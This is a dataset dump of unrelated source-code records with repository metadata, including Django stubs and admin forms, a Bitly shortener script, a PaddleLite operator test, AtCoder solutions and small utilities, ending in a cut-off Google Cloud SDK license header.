7af3d393b2ab28233d6337137cf6f36f1ad5421a
|
a12c090eb57da4c8e1f543a1a9d497abad763ccd
|
/django-stubs/conf/urls/i18n.pyi
|
92bedee797dfd45df0608d28ec4edc703e475012
|
[
"BSD-3-Clause"
] |
permissive
|
debuggerpk/django-stubs
|
be12eb6b43354a18675de3f70c491e534d065b78
|
bbdaebb244bd82544553f4547157e4f694f7ae99
|
refs/heads/master
| 2020-04-04T08:33:52.358704
| 2018-09-26T19:32:19
| 2018-09-26T19:32:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
pyi
|
from typing import Any, List, Optional, Tuple, Union
from django.urls.resolvers import URLPattern, URLResolver
def i18n_patterns(
*urls: Any, prefix_default_language: bool = ...
) -> Union[List[List[Any]], List[URLPattern], List[URLResolver]]: ...
def is_language_prefix_patterns_used(urlconf: str) -> Tuple[bool, bool]: ...
urlpatterns: Any
|
[
"maxim.kurnikov@gmail.com"
] |
maxim.kurnikov@gmail.com
|
591625010b059b7a1ee63a7bc597dfa5a0166c26
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02733/s001901229.py
|
aba6fbc1ebc1dcab87ce5d60ec89617753016b1a
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,527
|
py
|
import math
#import numpy as np
import queue
from collections import deque,defaultdict
import heapq as hpq
import itertools
from sys import stdin,setrecursionlimit
#from scipy.sparse.csgraph import dijkstra
#from scipy.sparse import csr_matrix
ipt = stdin.readline
setrecursionlimit(10**7)
def main():
h,w,k = map(int,ipt().split())
s = [list(map(int,list(input()))) for _ in [0]*h]
'''
sms = [[0]*w for _ in [0]*h]
for i in range(w):
for j in range(h):
sms[j][i] = sms[j-1][i]+s[j][i]
print(i)
'''
cmi = 10**18
for i in range(2**(h-1)):
pos = [0]*h
for j in range(h-1):
if (i >> j) & 1:
pos[j+1] = pos[j]+1
else:
pos[j+1] = pos[j]
cmii = pos[-1]
si = [0]*h
for jj in range(h):
si[pos[jj]] += s[jj][0]
if max(si) > k:
continue
f = True
for j in range(1,w):
if f:
for ii in range(h):
if si[pos[ii]]+s[ii][j] > k:
cmii += 1
si = [0]*h
for jj in range(h):
si[pos[jj]] += s[jj][j]
if max(si) > k:
f = False
break
else:
si[pos[ii]]+=s[ii][j]
if f and cmii < cmi:
cmi = cmii
print(cmi)
return
if __name__ == '__main__':
main()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
85a6f0dce317685ae612e2bca918b99ee3ef6b1d
|
3a4549470cb0e6e55c98522ba08ce629d60960ea
|
/froide/team/admin.py
|
bd9346dc479e03302643ee0b3e01d265517a39e5
|
[
"MIT"
] |
permissive
|
lanmarc77/froide
|
4e28d3e33017b3e776a7eb13d63c7b71bdb3bc68
|
bddc8bb27c8a7c2a959003dda724194948bc381a
|
refs/heads/main
| 2023-03-17T03:02:01.277465
| 2021-03-06T16:37:26
| 2021-03-06T16:37:26
| 345,137,125
| 0
| 0
|
MIT
| 2021-03-06T16:13:09
| 2021-03-06T16:13:09
| null |
UTF-8
|
Python
| false
| false
| 359
|
py
|
from django.contrib import admin
from .models import Team, TeamMembership
class TeamMembershipInline(admin.StackedInline):
model = TeamMembership
raw_id_fields = ('user', 'team',)
class TeamAdmin(admin.ModelAdmin):
list_display = ('name', 'created', 'member_count')
inlines = [TeamMembershipInline]
admin.site.register(Team, TeamAdmin)
|
[
"mail@stefanwehrmeyer.com"
] |
mail@stefanwehrmeyer.com
|
4450c9e63147eef26ddad97af09b212090a7a78f
|
46224332185d4d0a1a56ba12ca0fad68e0090693
|
/main.py
|
ea6fe8fcf3a2f2104be8faa4f8b4442114aad9ed
|
[] |
no_license
|
n1k0din/bitly
|
131ccc2d56e60b994a7eb04a1809744c27f7092c
|
a6a4735105e09fcc7134783ad2748239f2e92127
|
refs/heads/main
| 2023-04-03T11:27:25.676797
| 2021-04-14T00:03:27
| 2021-04-14T00:03:27
| 356,873,736
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,554
|
py
|
import argparse
import os
from urllib.parse import urlparse
import requests
from dotenv import load_dotenv
BITLY_API_URL = 'https://api-ssl.bitly.com/v4'
def create_argument_parser():
parser = argparse.ArgumentParser(description='Сокращает ссылку или выдает \
количество кликов по битлинку')
parser.add_argument('url', help='URL для обработки')
return parser
def create_auth_headers(token):
return {'Authorization': f'Bearer {token}'}
def remove_scheme_from_url(url):
parsed = urlparse(url)
return parsed._replace(scheme='').geturl()
def is_bitlink(token, url):
headers = create_auth_headers(token)
stripped_url = remove_scheme_from_url(url)
bitlink_info_method = f'/bitlinks/{stripped_url}'
bitlink_info_url = f'{BITLY_API_URL}{bitlink_info_method}'
response = requests.get(bitlink_info_url, headers=headers)
return response.ok
def shorten_link(token, url):
headers = create_auth_headers(token)
shorten_method = '/shorten'
shorten_url = f'{BITLY_API_URL}{shorten_method}'
payload = {'long_url': url}
response = requests.post(shorten_url, headers=headers, json=payload)
response.raise_for_status()
return response.json()['link']
def count_clicks(token, bitlink):
headers = create_auth_headers(token)
stripped_url = remove_scheme_from_url(bitlink)
count_clicks_method = f'/bitlinks/{stripped_url}/clicks/summary'
count_clicks_url = f'{BITLY_API_URL}{count_clicks_method}'
params = {'units': -1}
response = requests.get(count_clicks_url, headers=headers, params=params)
response.raise_for_status()
return response.json()['total_clicks']
def process_url(token, url):
if is_bitlink(token, url):
try:
clicks_amount = count_clicks(token, url)
except requests.exceptions.HTTPError:
return 'Кажется, нет такой ссылки'
return f'Количество кликов: {clicks_amount}'
try:
bitlink = shorten_link(token, url)
except requests.exceptions.HTTPError as e:
return f'{e}\nНе удалось получить сокращенную ссылку, проверьте ввод'
return f'{bitlink}'
def main():
load_dotenv()
bitly_token = os.getenv('BITLY_TOKEN')
arg_parser = create_argument_parser()
user_link = arg_parser.parse_args().url
print(process_url(bitly_token, user_link))
if __name__ == '__main__':
main()
|
[
"nik726@gmail.com"
] |
nik726@gmail.com
|
7ff446abab86764c91765bd0cb1939d5c7d97daa
|
6da0ded69dde46394dc00f6cebd2541938920dff
|
/lite/tests/unittest_py/op/test_reduce_mean_op.py
|
17349af14ca5bb7ec03c6ee39edb95d7a67eb33e
|
[
"Apache-2.0"
] |
permissive
|
ishine/paddle-mobile
|
e346f1fb537485d60c6e8f7eb5cba102de0fe6c2
|
42dbfe288dc49625649dc9499258d2bcf79c9dcd
|
refs/heads/develop
| 2023-05-30T10:17:52.866644
| 2023-05-16T11:40:33
| 2023-05-16T11:40:33
| 201,366,144
| 0
| 0
|
Apache-2.0
| 2020-01-14T07:23:03
| 2019-08-09T01:35:22
|
C++
|
UTF-8
|
Python
| false
| false
| 4,949
|
py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('../')
from auto_scan_test import AutoScanTest, IgnoreReasons
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume
import hypothesis.strategies as st
from functools import partial
import numpy as np
import argparse
class TestReduceMeanOp(AutoScanTest):
def __init__(self, *args, **kwargs):
AutoScanTest.__init__(self, *args, **kwargs)
self.enable_testing_on_place(TargetType.X86, PrecisionType.FP32,
DataLayoutType.NCHW)
self.enable_testing_on_place(
TargetType.ARM,
PrecisionType.FP32,
DataLayoutType.NCHW,
thread=[1, 4])
opencl_places = [
Place(TargetType.OpenCL, PrecisionType.FP16,
DataLayoutType.ImageDefault), Place(
TargetType.OpenCL, PrecisionType.FP16,
DataLayoutType.ImageFolder),
Place(TargetType.OpenCL, PrecisionType.FP32, DataLayoutType.NCHW),
Place(TargetType.OpenCL, PrecisionType.Any,
DataLayoutType.ImageDefault), Place(
TargetType.OpenCL, PrecisionType.Any,
DataLayoutType.ImageFolder),
Place(TargetType.OpenCL, PrecisionType.Any, DataLayoutType.NCHW),
Place(TargetType.Host, PrecisionType.FP32)
]
self.enable_testing_on_place(places=opencl_places)
self.enable_testing_on_place(TargetType.NNAdapter, PrecisionType.FP32)
self.enable_devices_on_nnadapter(device_names=[
"cambricon_mlu", "intel_openvino", "kunlunxin_xtcl"
])
def is_program_valid(self,
program_config: ProgramConfig,
predictor_config: CxxConfig) -> bool:
return True
def sample_program_configs(self, draw):
in_shape = draw(
st.lists(
st.integers(
min_value=1, max_value=10), min_size=4, max_size=4))
keep_dim = draw(st.booleans())
axis_list = draw(
st.sampled_from([[0], [1], [2], [3], [0, 1], [1, 2], [2, 3]]))
reduce_all_data = True if axis_list == None or axis_list == [] else False
def generate_input(*args, **kwargs):
return np.random.random(in_shape).astype(np.float32)
build_ops = OpConfig(
type="reduce_mean",
inputs={"X": ["input_data"], },
outputs={"Out": ["output_data"], },
attrs={
"dim": axis_list,
"keep_dim": keep_dim,
"reduce_all": reduce_all_data,
})
program_config = ProgramConfig(
ops=[build_ops],
weights={},
inputs={
"input_data": TensorConfig(data_gen=partial(generate_input)),
},
outputs=["output_data"])
return program_config
def sample_predictor_configs(self):
return self.get_predictor_configs(), ["reduce_mean"], (1e-2, 1e-2)
def add_ignore_pass_case(self):
def _teller1(program_config, predictor_config):
target_type = predictor_config.target()
in_shape = list(program_config.inputs["input_data"].shape)
axis = program_config.ops[0].attrs["dim"]
if target_type == TargetType.OpenCL:
if len(axis) == 1 and len(in_shape) == 4:
return True
self.add_ignore_check_case(
_teller1, IgnoreReasons.ACCURACY_ERROR,
"The op output has diff in a specific case on opencl. We need to fix it as soon as possible."
)
def _teller3(program_config, predictor_config):
target_type = predictor_config.target()
if target_type == TargetType.OpenCL:
return True
self.add_ignore_check_case(_teller3,
IgnoreReasons.PADDLELITE_NOT_SUPPORT,
"Expected kernel_type false.")
def test(self, *args, **kwargs):
self.run_and_statis(quant=False, max_examples=100)
if __name__ == "__main__":
unittest.main(argv=[''])
|
[
"noreply@github.com"
] |
ishine.noreply@github.com
|
da715d70607b45a4b6225f162482dd1ef2943ae5
|
1af49694004c6fbc31deada5618dae37255ce978
|
/chrome/browser/chromeos/exo/DEPS
|
1ff90b7330527bd26d73215c1179e91ca9fc6fb5
|
[
"BSD-3-Clause"
] |
permissive
|
sadrulhc/chromium
|
59682b173a00269ed036eee5ebfa317ba3a770cc
|
a4b950c23db47a0fdd63549cccf9ac8acd8e2c41
|
refs/heads/master
| 2023-02-02T07:59:20.295144
| 2020-12-01T21:32:32
| 2020-12-01T21:32:32
| 317,678,056
| 3
| 0
|
BSD-3-Clause
| 2020-12-01T21:56:26
| 2020-12-01T21:56:25
| null |
UTF-8
|
Python
| false
| false
| 166
|
specific_include_rules = {
"chrome_file_helper\.cc": [
"+ash/wm/window_util.h",
],
"chrome_file_helper_unittest\.cc": [
"+ash/wm/window_util.h",
],
}
|
[
"commit-bot@chromium.org"
] |
commit-bot@chromium.org
|
|
0606e6062f3381696f7a7d9c201d4a0bb6283488
|
6b1e89d486515d40722cf780a2925c7269f68c5f
|
/05Month/pandas/extra/stock.py
|
d16f6b661d65d232a678f127998c4a1869ee33c5
|
[] |
no_license
|
LiuJingGitLJ/PythonAnalysis
|
c2c7d96a1dde81a911a828a9dcb4e3fc868ca83e
|
ddee4a026b3313aa43583311a1b73b22d5f13678
|
refs/heads/master
| 2020-03-14T22:58:48.329637
| 2018-05-02T12:22:30
| 2018-05-02T12:22:30
| 131,833,542
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,988
|
py
|
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
names = ['date',
'time',
'opening_price',
'ceiling_price',
'floor_price',
'closing_price',
'volume',
'amount']
raw = pd.read_csv('SH600690.csv', names = names, header = None, index_col='date', parse_dates=True)
print raw.head()
print
'''
# 根据涨跌幅判断数据是否有效
def _valid_price(prices):
return (((prices.max() - prices.min()) / prices.min()) < 0.223).all()
# 按日期分组
days = raw.groupby(level = 0).agg(
{'opening_price':lambda prices: _valid_price(prices) and prices[0] or 0,
'ceiling_price':lambda prices: _valid_price(prices) and np.max(prices) or 0,
'floor_price':lambda prices: _valid_price(prices) and np.min(prices) or 0,
'closing_price':lambda prices: _valid_price(prices) and prices[-1] or 0,
'volume':'sum',
'amount':'sum'})
print days.head()
print
# 缺少数据处理,因为周末没有交易。
start = days.iloc[0:1].index.tolist()[0]
end = days.iloc[-2:-1].index.tolist()[0]
new_idx = pd.date_range(start = start, end = end)
print new_idx
data = days.reindex(new_idx) # 重新索引
zero_values = data.loc[~(data.volume > 0)].loc[:, ['volume', 'amount']]
data.update(zero_values.fillna(0)) # 交易量和金额填0
data.fillna(method = 'ffill', inplace = True) # 价格用前一天的填充
print data.head()
print
# 计算30各自然日里的股票平均波动周率
def gen_item_group_index(total, group_len):
group_count = total / group_len
group_index = np.arange(total)
for i in xrange(group_count):
group_index[i * group_len: (i+ 1) * group_len] = i
group_index[(i + 1) * group_len:] = i +1
return group_index.tolist()
period = 30
group_index = gen_item_group_index(len(data), period)
data['group_index'] = group_index
print data.head().append(data.tail())
# 为负表示先出现最高价再出现最低价,即下跌波动。
def _ceiling_price(prices):
return prices.idxmin() < prices.idxmax() and np.max(prices) or (-np.max(prices))
group = data.groupby('group_index').agg(
{'volume': 'sum',
'floor_price': 'min',
'ceiling_price': _ceiling_price})
print group.head()
date_col = pd.DataFrame({'group_index': group_index, 'date': new_idx})
print date_col
group['date'] = date_col.groupby('group_index').agg('first') # 为每个索引添加开始日期
print group.head()
group['ripples_ratio'] = group.ceiling_price / group.floor_price # 计算并添加波动率
print group.head()
print
# 波动率排序
ripples = group.sort_values('ripples_ratio', ascending = False)
print ripples
print ripples.head(10).ripples_ratio.mean()
print ripples.tail(10).ripples_ratio.mean()
print
# 计算涨跌幅
rise = data.closing_price.diff()
data['rise'] = rise
print data.head()
'''
|
[
"15201078137@163.com"
] |
15201078137@163.com
|
4cd21e735decb89c8f8517e5a9d9ad37539c3fcb
|
c33afad644823bff35e616de90713ba0db50c152
|
/xia2-attic/Applications/get_ccp4_commands.py
|
efef79c10fdb753c96a78144c97a0ca908db641a
|
[] |
no_license
|
xia2/trashcan
|
fe58cc189cb167be6fdda131b8af04b6a126f114
|
05b2423823297b89e7dc1c5fb68285d1bfc8d48f
|
refs/heads/master
| 2021-01-01T19:02:19.523868
| 2015-07-21T11:41:19
| 2015-07-21T11:41:19
| 39,441,400
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 944
|
py
|
#!/usr/bin/env python
import sys
def get_ccp4_commands(lines_of_input):
'''Get the commands which were sent to a CCP4 program.'''
# first look through for hklin / hklout
logicals = { }
for line in lines_of_input:
if 'Logical Name:' in line:
token = line.split(':')[1].split()[0]
value = line.split(':')[-1].strip()
logicals[token] = value
# then look for standard input commands
script = []
for line in lines_of_input:
if 'Data line---' in line:
script.append(line.replace('Data line---', '').strip())
return script, logicals
if __name__ == '__main__':
if len(sys.argv) != 2:
raise RuntimeError, '%s ccp4_program.log' % sys.argv[0]
script, logicals = get_ccp4_commands(open(sys.argv[1], 'r').readlines())
for token in logicals.keys():
print token, logicals[token]
for line in script:
print line
|
[
"graeme.winter@gmail.com"
] |
graeme.winter@gmail.com
|
f9d1b1d94284348c99187c29166134746d461bcc
|
960ca4512880cdfdc6daccde8d9271b611824ddb
|
/exps/vis/test.py
|
17ccb9517f47b95b538e761d0c39a60b2036f54b
|
[
"MIT"
] |
permissive
|
xiaoye77/NAS-Projects
|
f0b66207814fd1ee9e656678230eed5a491d7deb
|
db44e56fb6b756e03b3d04228fccb6b0fd1060c2
|
refs/heads/master
| 2020-12-04T03:53:36.442866
| 2020-01-02T05:49:16
| 2020-01-02T05:49:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,118
|
py
|
# python ./exps/vis/test.py
import os, sys, random
from pathlib import Path
import torch
import numpy as np
from collections import OrderedDict
lib_dir = (Path(__file__).parent / '..' / '..' / 'lib').resolve()
if str(lib_dir) not in sys.path: sys.path.insert(0, str(lib_dir))
from graphviz import Digraph
def test_nas_api():
from nas_102_api import ArchResults
xdata = torch.load('/home/dxy/FOR-RELEASE/NAS-Projects/output/NAS-BENCH-102-4/simplifies/architectures/000157-FULL.pth')
for key in ['full', 'less']:
print ('\n------------------------- {:} -------------------------'.format(key))
archRes = ArchResults.create_from_state_dict(xdata[key])
print(archRes)
print(archRes.arch_idx_str())
print(archRes.get_dataset_names())
print(archRes.get_comput_costs('cifar10-valid'))
# get the metrics
print(archRes.get_metrics('cifar10-valid', 'x-valid', None, False))
print(archRes.get_metrics('cifar10-valid', 'x-valid', None, True))
print(archRes.query('cifar10-valid', 777))
OPS = ['skip-connect', 'conv-1x1', 'conv-3x3', 'pool-3x3']
COLORS = ['chartreuse' , 'cyan' , 'navyblue', 'chocolate1']
def plot(filename):
g = Digraph(
format='png',
edge_attr=dict(fontsize='20', fontname="times"),
node_attr=dict(style='filled', shape='rect', align='center', fontsize='20', height='0.5', width='0.5', penwidth='2', fontname="times"),
engine='dot')
g.body.extend(['rankdir=LR'])
steps = 5
for i in range(0, steps):
if i == 0:
g.node(str(i), fillcolor='darkseagreen2')
elif i+1 == steps:
g.node(str(i), fillcolor='palegoldenrod')
else: g.node(str(i), fillcolor='lightblue')
for i in range(1, steps):
for xin in range(i):
op_i = random.randint(0, len(OPS)-1)
#g.edge(str(xin), str(i), label=OPS[op_i], fillcolor=COLORS[op_i])
g.edge(str(xin), str(i), label=OPS[op_i], color=COLORS[op_i], fillcolor=COLORS[op_i])
#import pdb; pdb.set_trace()
g.render(filename, cleanup=True, view=False)
if __name__ == '__main__':
test_nas_api()
for i in range(200): plot('{:04d}'.format(i))
|
[
"280835372@qq.com"
] |
280835372@qq.com
|
e1f0e5d00a2ac00fd29fe1510687dbba7b48f35e
|
4a8c1f7d9935609b780aff95c886ef7781967be0
|
/atcoder/ABC/D/154_d.py
|
43055970fa71c8d1fc0e279b10cfca40369c0986
|
[] |
no_license
|
recuraki/PythonJunkTest
|
d5e5f5957ac5dd0c539ef47759b1fe5ef7a2c52a
|
2556c973d468a6988d307ce85c5f2f8ab15e759a
|
refs/heads/master
| 2023-08-09T17:42:21.875768
| 2023-07-18T23:06:31
| 2023-07-18T23:06:31
| 13,790,016
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,613
|
py
|
import sys
from io import StringIO
import unittest
import logging
logging.basicConfig(level=logging.DEBUG)
def resolve():
n, k = map(int, input().split())
dat = list(map(int, input().split()))
dat2 = []
m = -1
#print(dat[:k])
n = sum(dat[:k])
dat2.append(n)
m = n
mind = 0
for i in range(1, len(dat) - k ):
#print("in/out")
#print(dat[k+i])
#print(dat[i])
n += dat[k+i]
n -= dat[i]
dat2.append(n)
if n > m:
m = n
mind = i + 1
#print(dat2)
#print(m)
#print(mind)
r = 0
for i in range(mind, mind + k):
r += (dat[i] + 1) / 2
print(r)
class TestClass(unittest.TestCase):
def assertIO(self, input, output):
stdout, stdin = sys.stdout, sys.stdin
sys.stdout, sys.stdin = StringIO(), StringIO(input)
resolve()
sys.stdout.seek(0)
out = sys.stdout.read()[:-1]
sys.stdout, sys.stdin = stdout, stdin
self.assertEqual(out, output)
def test_input_1(self):
print("test_input_1")
input = """5 3
1 2 2 4 5"""
output = """7.000000000000"""
self.assertIO(input, output)
def test_input_2(self):
print("test_input_2")
input = """4 1
6 6 6 6"""
output = """3.500000000000"""
self.assertIO(input, output)
def test_input_3(self):
print("test_input_3")
input = """10 4
17 13 13 12 15 20 10 13 17 11"""
output = """32.000000000000"""
self.assertIO(input, output)
if __name__ == "__main__":
unittest.main()
|
[
"glenda.kanai@gmail.com"
] |
glenda.kanai@gmail.com
|
678bbf0f3acbb639e8f26ad0eda2be449d96f08b
|
29e4d393351c87741f069092eb8d0ab6f1221d6f
|
/venv/lib/python3.6/site-packages/Crypto/Cipher/_mode_openpgp.pyi
|
14b810588d15c2c693b6b6580803aee05847cfe4
|
[
"MIT"
] |
permissive
|
masora1030/eigoyurusan
|
f0eb7d9761aa150379b558c13fc2477daf504417
|
fa82044a2dc2f0f1f7454f5394e6d68fa923c289
|
refs/heads/master
| 2022-12-01T09:31:17.330620
| 2020-07-22T14:51:59
| 2020-07-22T14:51:59
| 279,682,018
| 11
| 2
|
MIT
| 2020-07-22T22:02:57
| 2020-07-14T20:03:45
|
Python
|
UTF-8
|
Python
| false
| false
| 556
|
pyi
|
from types import ModuleType
from typing import Union, Dict
Buffer = Union[bytes, bytearray, memoryview]
__all__ = ['OpenPgpMode']
class OpenPgpMode(object):
block_size: int
iv: Union[bytes, bytearray, memoryview]
IV: Union[bytes, bytearray, memoryview]
def __init__(self,
factory: ModuleType,
key: Buffer,
iv: Buffer,
cipher_params: Dict) -> None: ...
def encrypt(self, plaintext: Buffer) -> bytes: ...
def decrypt(self, plaintext: Buffer) -> bytes: ...
|
[
"soraemonpockt@icloud.com"
] |
soraemonpockt@icloud.com
|
8ab7dff45d69393de7c70aedebe150563e1b17ff
|
7942342d457276bb266228d0236af647b3d55477
|
/django/contrib/sites/managers.pyi
|
465f1dc86cf24c0cc822bb976a68d2719d74eb2b
|
[
"MIT"
] |
permissive
|
AsymmetricVentures/mypy-django
|
847c4e521ce4dec9a10a1574f9c32b234dafd00b
|
f6e489f5cf5672ecede323132665ccc6306f50b8
|
refs/heads/master
| 2020-06-30T01:53:44.434394
| 2016-12-22T22:45:50
| 2016-12-22T22:45:50
| 74,397,884
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 417
|
pyi
|
# Stubs for django.contrib.sites.managers (Python 3.6)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from typing import Any, Optional
from django.db import models
class CurrentSiteManager(models.Manager):
use_in_migrations = ... # type: bool
def __init__(self, field_name: Optional[Any] = ...) -> None: ...
def check(self, **kwargs): ...
def get_queryset(self): ...
|
[
"reames@asymmetricventures.com"
] |
reames@asymmetricventures.com
|
1220ca9448bfb849dd34483c850bc5f2d5ba6069
|
0f3411225b51d13fd418814c02d153493b06c1b9
|
/app/admin/forms.py
|
4202c752dcb6839eed82ea82954fec18498e84fd
|
[] |
no_license
|
ChenxiiCheng/flask-movie
|
9220decb79171281aa1348bd482f24fe1f2a3097
|
623ce5ba6c6379bed6b71adf321680e9cb5e6df3
|
refs/heads/master
| 2020-04-30T03:44:26.172855
| 2019-03-19T20:37:57
| 2019-03-19T20:37:57
| 176,594,138
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,029
|
py
|
# coding:utf8
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, FileField, TextAreaField, SelectField, SelectMultipleField
from wtforms.validators import DataRequired, ValidationError, EqualTo
from app.models import Admin, Tag, Auth, Role
tags = Tag.query.all()
auth_list = Auth.query.all()
role_list = Role.query.all()
class LoginForm(FlaskForm):
"管理员登录表单"
account = StringField(
label="账号",
validators=[
DataRequired("请输入账号")
],
description="账号",
render_kw={
"class": "form-control",
"placeholder": "请输入账号!",
# "required": "required"
},
)
pwd = PasswordField(
label="密码",
validators=[
DataRequired("请输入密码")
],
description="密码",
render_kw={
"class": "form-control",
"placeholder": "请输入密码",
# "required": "required"
},
)
submit = SubmitField(
label="登录",
render_kw={
"class": "btn btn-primary btn-block btn-flat",
}
)
def validate_account(self, field):
account = field.data
admin = Admin.query.filter_by(name=account).count()
if admin == 0:
raise ValidationError("账号不存在!")
class TagForm(FlaskForm):
name = StringField(
label="名称",
validators=[
DataRequired("请输入标签")
],
description="标签",
render_kw={
"class": "form-control",
"id": 'input_name',
"placeholder": "请输入标签名称!"
},
)
submit = SubmitField(
"编辑",
render_kw={
"class": "btn btn-primary",
}
)
class MovieForm(FlaskForm):
title = StringField(
label="片名",
validators=[
DataRequired("请输入片名!")
],
description="片名",
render_kw={
"class": "form-control",
"placeholder": "请输入片名!"
},
)
url = FileField(
label="文件",
validators=[
DataRequired("请上传文件!")
],
description="文件",
)
info = TextAreaField(
label="简介",
validators=[
DataRequired("请输入简介!")
],
description="简介",
render_kw={
"class": "form-control",
"row": 10
},
)
logo = FileField(
label="封面",
validators=[
DataRequired("请上传封面!")
],
description="封面",
)
star = SelectField(
label="星级",
validators=[
DataRequired("请选择星级!")
],
# star的数据类型
coerce=int,
choices=[(1, "1星"), (2, "2星"), (3, "3星"), (4, "4星"), (5, "5星")],
description="星级",
render_kw={
"class": "form-control",
}
)
tag_id = SelectField(
label="标签",
validators=[
DataRequired("请选择标签!")
],
coerce=int,
choices=[(v.id, v.name) for v in tags],
description="标签",
render_kw={
"class": "form-control",
},
)
area = StringField(
label="地区",
validators=[
DataRequired("请输入地区!")
],
description="地区",
render_kw={
"class": "form-control",
"placeholder": "请输入地区!"
},
)
length = StringField(
label="片长",
validators=[
DataRequired("请输入片长!")
],
description="片长",
render_kw={
"class": "form-control",
"placeholder": "请输入片长!"
},
)
release_time = StringField(
label="上映时间",
validators=[
DataRequired("请选择上映时间!")
],
description="上映时间",
render_kw={
"class": "form-control",
"placeholder": "请选择上映时间!",
"id": "input_release_time"
},
)
submit = SubmitField(
"编辑",
render_kw={
"class": "btn btn-primary",
}
)
class PreviewForm(FlaskForm):
title = StringField(
label="预告标题",
validators=[
DataRequired("请输入预告标题!")
],
description="预告标题",
render_kw={
"class": "form-control",
"placeholder": "请输入预告标题!"
},
)
logo = FileField(
label="预告封面",
validators=[
DataRequired("请上传预告封面!")
],
description="预告封面",
)
submit = SubmitField(
"编辑",
render_kw={
"class": "btn btn-primary",
}
)
class PwdForm(FlaskForm):
old_pwd = PasswordField(
label="旧密码",
validators=[
DataRequired("请输入旧密码!")
],
description="旧密码",
render_kw={
"class": "form-control",
"palceholder": "请输入旧密码!",
}
)
new_pwd = PasswordField(
label="新密码",
validators=[
DataRequired("请输入新密码!")
],
description="新密码",
render_kw={
"class": "form-control",
"palceholder": "请输入新密码!",
}
)
submit = SubmitField(
"编辑",
render_kw={
"class": "btn btn-primary",
}
)
def validate_old_pwd(self, field):
from flask import session
pwd = field.data
name = session["admin"]
admin = Admin.query.filter_by(
name=name
).first()
if not admin.check_pwd(pwd):
raise ValidationError("旧密码错误!")
class AuthForm(FlaskForm):
name = StringField(
label="权限名称",
validators=[
DataRequired("请输入权限名称!")
],
description="权限名称",
render_kw={
"class": "form-control",
"placeholder": "请输入权限名称!"
},
)
url = StringField(
label="权限地址",
validators=[
DataRequired("请输入权限地址!")
],
description="权限地址",
render_kw={
"class": "form-control",
"placeholder": "请输入权限地址!"
},
)
submit = SubmitField(
"编辑",
render_kw={
"class": "btn btn-primary",
}
)
class RoleForm(FlaskForm):
name = StringField(
label="角色名称",
validators=[
DataRequired("请输入角色名称!")
],
description="角色名称",
render_kw={
"class": "form-control",
"placeholder": "请输入角色名称!"
},
)
auths = SelectMultipleField(
label="权限列表",
validators=[
DataRequired("请选择权限列表!")
],
coerce=int,
choices=[(v.id, v.name) for v in auth_list],
description="权限列表",
render_kw={
"class": "form-control",
}
)
submit = SubmitField(
"编辑",
render_kw={
"class": "btn btn-primary",
}
)
class AdminForm(FlaskForm):
name = StringField(
label="管理员名称",
validators=[
DataRequired("请输入管理员名称!")
],
description="管理员名称",
render_kw={
"class": "form-control",
"placeholder": "请输入管理员名称!",
},
)
pwd = PasswordField(
label="管理员密码",
validators=[
DataRequired("请输入管理员密码!")
],
description="管理员密码",
render_kw={
"class": "form-control",
"placeholder": "请输入管理员密码!",
},
)
repwd = PasswordField(
label="管理员重复密码",
validators=[
DataRequired("请输入管理员重复密码"),
EqualTo('pwd', message="两次密码不一致!")
],
description="管理员重复密码",
render_kw={
"class": "form-control",
"placeholder": "请输入管理员重复密码",
},
)
role_id = SelectField(
label="所属角色",
coerce=int,
choices=[(v.id, v.name) for v in role_list],
render_kw={
"class": "form-control",
}
)
submit = SubmitField(
label="编辑",
render_kw={
"class": "btn btn-primary",
}
)
|
[
"chenxic1011@gmail.com"
] |
chenxic1011@gmail.com
|
01dd184374b0b82db5104e26148e92a0b14e6031
|
d83fde3c891f44014f5339572dc72ebf62c38663
|
/_bin/google-cloud-sdk/lib/surface/compute/interconnects/attachments/create.py
|
36182101c61039ba02985a4cafd3b3b5d13f0b6c
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
gyaresu/dotfiles
|
047cc3ca70f4b405ba272856c69ee491a79d2ebe
|
e5e533b3a081b42e9492b228f308f6833b670cfe
|
refs/heads/master
| 2022-11-24T01:12:49.435037
| 2022-11-01T16:58:13
| 2022-11-01T16:58:13
| 17,139,657
| 1
| 1
| null | 2020-07-25T14:11:43
| 2014-02-24T14:59:59
|
Python
|
UTF-8
|
Python
| false
| false
| 3,990
|
py
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
